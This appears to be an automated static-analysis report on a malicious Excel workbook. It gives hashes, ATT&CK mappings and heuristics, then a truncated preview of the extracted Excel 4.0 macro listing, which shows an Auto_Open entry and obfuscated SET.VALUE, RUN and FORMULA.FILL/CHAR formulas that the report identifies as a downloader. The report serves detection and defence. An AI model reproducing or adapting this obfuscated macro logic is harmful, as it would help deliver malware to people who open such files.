Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d32455d9736e1464…

MALICIOUS

Office (OLE)

Size: 171.0 KB
Created: 2020-05-13 12:29:13
Authoring application: Microsoft Excel
First seen: 2020-09-07
MD5: c0c3d096d77211b70f6111d24af363b2
SHA-1: 0de5cafbaffa619cb04e4209f3808e968f55e20d
SHA-256: d32455d9736e1464b5b759c50fedc1396b448619deb476e608e7ceab9d9c93d8
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open defined name, which is a known method for executing arbitrary code. The macros utilize dangerous formula APIs such as RUN and SET.VALUE, suggesting an intent to download and execute a secondary payload. The specific functions used point towards a macro-based downloader.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name (severity: critical, rule: OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs (severity: critical, rule: OLE_XLM_DANGEROUS_FN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present (severity: medium, rule: OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 130585 bytes
SHA-256: 97c3e4918a2e7e7c16a7412de0ba91e15a1a1b111febaeea9a580d663f3ebc69
Preview script (first 1,000 lines of the extracted script)
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!EH17079 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,S19,"",0.67222222222222216548
'  Sheet,JN38,"",2869.00000000000000000000
'  Sheet,BE93,"",-2799.00000000000000000000
'  Sheet,EX110,"SET.VALUE(HC46079,363/5)",""
'  Sheet,EX111,GOTO(BJ51366),""
'  Sheet,CW173,"",-28.81318681318681385051
'  Sheet,EJ188,"",147.40007812499999317879
'  Sheet,HW200,"",-2.37362637362637363125
'  Sheet,HE228,"",453.50000000000000000000
'  Sheet,EF260,"",-1.41025641025641035320
'  Sheet,JH331,"",-1.15882352941176458572
'  Sheet,CQ334,"",198.00000000000000000000
'  Sheet,GR339,"",2852.00000000000000000000
'  Sheet,GI353,"SET.VALUE(JH23972,GET.CELL(50,DI58290)+-368.00000000000000000000-4)",""
'  Sheet,GI354,RUN(IL49025),""
'  Sheet,JF473,"",0.19578947368421051323
'  Sheet,GR536,"",-0.21311475409836064254
'  Sheet,JU559,"",-0.41417910447761191461
'  Sheet,CZ594,"",-0.83870967741935487094
'  Sheet,EX598,"",6.88405797101449312692
'  Sheet,DZ630,"",-5.50746268656716431167
'  Sheet,H635,"",404.00000000000000000000
'  Sheet,CZ663,"",-0.44262295081967212296
'  Sheet,EZ675,"",0.07960199004975124226
'  Sheet,JG757,"",-6.10000488281249975131
'  Sheet,JJ774,"",429.00000000000000000000
'  Sheet,JQ779,"",431.00000000000000000000
'  Sheet,BX824,"",322.00000000000000000000
'  Sheet,CB949,"",-2.16666666666666651864
'  Sheet,EB973,"",0.67850467289719618158
'  Sheet,FP989,"",-6.70000488281250028422
'  Sheet,BJ1047,"",285.00000000000000000000
'  Sheet,FJ1066,"",313.00000000000000000000
'  Sheet,G1158,"",-98.75000000000000000000
'  Sheet,CW1163,"",265.00000000000000000000
'  Sheet,JF1171,"",-18.75000000000000000000
'  Sheet,M1225,"",-30.75000000000000000000
'  Sheet,CZ1274,"",0.02714776632302405568
'  Sheet,FI1307,"",0.31272727272727274261
'  Sheet,BE1308,"",-293.00000000000000000000
'  Sheet,GR1403,"",-3.13043478260869578733
'  Sheet,IX1409,"",-32.77501953125000255795
'  Sheet,GG1415,"",314.00000000000000000000
'  Sheet,FC1441,"",-2856.00000000000000000000
'  Sheet,HI1481,"",-315.00000000000000000000
'  Sheet,DO1483,"",-0.18852459016393441349
'  Sheet,JB1507,"",10.25510204081632714690
'  Sheet,ID1523,"",-247.00000000000000000000
'  Sheet,Q1556,"",-0.43032786885245899455
'  Sheet,EE1558,"",589.00000000000000000000
'  Sheet,F1621,"",-9.22500488281250063949
'  Sheet,DK1636,"",-309.00000000000000000000
'  Sheet,BE1658,"",-1.01025641025641021997
'  Sheet,IX1658,"",-0.37962962962962965019
'  Sheet,HT1692,"",214.00000000000000000000
'  Sheet,BD1800,"",-0.03127383676582761590
'  Sheet,ET1801,"FORMULA.FILL(CHAR(HR39641+G19229)&CHAR(DQ6366+DE21491)&CHAR(EK12587*EI24396)&CHAR(IF40813+IR28440)&CHAR(JC16649+BJ1047)&CHAR(EK12587*IU44129)&CHAR(JH23972*GJ51208)&CHAR(IF40813/DU63381)&CHAR(DQ6366/EN45003)&CHAR(JC16649+IX53149)&CHAR(DC38998/DL2681)&CHAR(IU35778+EB28757)&CHAR(DQ6366+IF21002)&CHAR(DO8517*HB46889)&CHAR(EA20210-Q37130)&CHAR(EK12587*FU61017)&CHAR(JH23972+GI36796)&CHAR(IF40813-FM35408)&CHAR(EA20210-DF64003)&CHAR(JH23972-GH4116)&CHAR(HR39641*FN20562)&CHAR(EA20210*DW51344),ET1802)",""
'  Sheet,ET1803,GOTO(GO4355),""
'  Sheet,F1815,"",-0.40163934426229508379
'  Sheet,HS1841,"",-430.00000000000000000000
'  Sheet,EF1898,"",10.79545454545454497008
'  Sheet,HN1898,"",6.98529411764705887578
'  Sheet,GD1923,"",-0.41393442622950821219
'  Sheet,HM1942,"",134.50000000000000000000
'  Sheet,CV1981,"FORMULA.FILL(CHAR(DU57124+Q41384)&CHAR(DQ22215+HW12711)&CHAR(JF7021/FD41122)&CHAR(DJ27233/T34888)&CHAR(DQ22215+FB39865)&CHAR(JS22779+H53258)&CHAR(JP52329-HV39723)&CHAR(DQ22215-Z4771)&CHAR(P20963+JK61516)&CHAR(JP52329*HO55806)&CHAR(HC46079/S19)&CHAR(JP52329+BV39906)&CHAR(DJ27233/CA45189)&CHAR(HC46079/EB973)&CHAR(DJ27233+FA52414)&CHAR(CB27422/ED26759)&CHAR
... (truncated)